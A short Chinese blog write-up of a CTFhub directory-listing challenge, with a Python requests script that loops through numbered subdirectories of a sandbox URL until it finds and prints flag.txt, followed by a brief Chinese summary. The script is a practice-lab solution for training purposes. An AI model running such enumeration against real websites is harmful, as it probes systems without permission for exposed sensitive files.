CTFhub 目录遍历
先点进去看了下目录,有两层,所以直接暴力循环
import requests
def nb():
url = "http://challenge-cd17494c9655b07d.sandbox.ctfhub.com:10800/flag_in_here/"
for i in range(1, 5):
for j in range(1, 5):
gg=url + str(i) + "/" + str(j)
find = requests.get(url + str(i) + "/" + str(j))
find.encoding = "utf-8"
if "flag.txt" in find.text:
print(requests.get(gg+"/flag.txt").text)
return
nb()
该博客介绍了如何通过Python进行目录遍历攻击,以寻找目标网站中的敏感文件`flag.txt`。作者使用了`requests`库,通过双重循环对URL的子目录进行穷举,当找到包含`flag.txt`的页面时,进一步请求该文件内容并打印出来。
2501

被折叠的 条评论
为什么被折叠?



